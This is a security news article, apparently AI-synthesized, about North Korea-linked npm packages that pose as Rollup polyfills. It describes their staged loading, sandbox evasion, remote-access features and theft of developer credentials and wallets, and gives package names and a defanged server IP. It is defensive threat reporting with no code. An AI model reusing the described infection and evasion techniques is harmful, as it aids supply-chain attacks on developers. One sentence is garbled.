VYPR
researchPublished Jul 3, 2026· 1 source

North Korea-Linked npm Packages Mimic Rollup Polyfills to Steal Developer Secrets

Malicious npm packages disguised as Rollup polyfill tools have been distributed by North Korean threat actors to steal developer secrets and establish remote access.

Threat actors with ties to North Korea have been linked to a fresh set of malicious npm packages that masquerade as Rollup polyfill tooling to facilitate remote access and data theft. According to JFrog, the packages "rollup-packages-polyfill-core" and "rollup-runtime-polyfill-core" mimic the legitimate "rollup-plugin-polyfill-node" project, down to the description, repository metadata, and package shape. The lookalike packages place themselves in the same rollup, polyfill, core, and node naming space, which can look plausible during a quick dependency review.

The campaign also involves four other packages, all of which have since been removed from the npm registry: "quirky-token," "react-icon-svgs," "rollup-plugin-polyfill-connect," and "swift-parse-stream." What's noteworthy here is that "rollup-packages-polyfill-core" installs and loads "swift-parse-stream," while "rollup-runtime-polyfill-core" installs and "quirky-token." In a similar fashion, "react-icon-svgs" has been found to install "rollup-plugin-polyfill-connect" as a second stage.

The second-stage packages are near-identical SVG utilities that fetch a JSON object from JSONKeeper and eval the model field. This layered structure, together with the lookalike names, legitimate-looking metadata, hidden install-time execution, environment checks, and credential-theft/remote-access payloads, is similar to previous North Korean Lazarus-linked npm campaigns. This is not the first time North Korean threat actors have uploaded npm packages impersonating Rollup polyfill tools; in April 2026, Panther detailed a sustained npm campaign that involved publishing 108 malicious npm packages spanning 261 versions to deliver BeaverTail and OtterCookie, two known malware families linked to Contagious Interview.

The attack begins with a Base64-encoded npm install command for "swift-parse-stream" (or "quirky-token") concealed within "rollup-packages-polyfill-core" (or "rollup-runtime-polyfill-core"). These second-stage packages, disguised as SVG sanitization utilities, reach out to a JSON Keeper URL to retrieve and execute JavaScript malware. The code performs checks to avoid execution within cloud development environments, sandboxes, serverless runtimes, and analysis infrastructure.

Past these initial checks, the malware installs necessary dependencies and contacts an external server ("216.126.236[.]244") to fetch an encrypted JavaScript payload. Upon decryption, this payload acts as a loader for additional scripts. These scripts enable remote access to the compromised host, supporting interactive terminal sessions, command execution, screenshot capture, process termination, and Windows-specific mouse and keyboard control using the "@nut-tree-fork/nut-js" package. Additionally, they are designed to steal data from web browsers and cryptocurrency wallets, collect files matching specific extensions, and periodically capture clipboard content.

The capabilities overlap with those of OtterCookie, with the use of "@nut-tree-fork/nut-js" for remote mouse and keyboard control also observed in a package named "express-session-js" detailed by SafeDep in April 2026. The file collector component specifically targets editor history for Microsoft Visual Studio Code, Windsurf, and Cursor, along with developer and AI tool configurations such as AWS, Microsoft Azure, Google Gemini, Anthropic Claude, Foundry, SSH, and Z shell (Zsh).

Rollup plugins are commonly loaded from local configuration files, developer workstations, and CI jobs. These environments often have access to sensitive assets such as source code, npm tokens, Git credentials, cloud keys, SSH keys, browser data, and project secrets. The payload is broader than a simple downloader; once later stages run, the attacker gains both collection and control capabilities, making it highly relevant to developer workstations and build machines where API keys, SSH keys, wallet material, cloud credentials, and project secrets are frequently present.

This disclosure coincides with the discovery of multiple software supply chain attacks by Checkmarx, SafeDep, and AWS security researcher Chi Tran, aimed at poisoning open-source package repositories and stealing valuable data. These include trojanized "pyrogram" forks (Operation Navy Ghost), npm packages mimicking Polymarket tooling, npm packages under the "@marketfront" scope, and a Python package named "security-alerts-sdk."

Synthesized by Vypr AI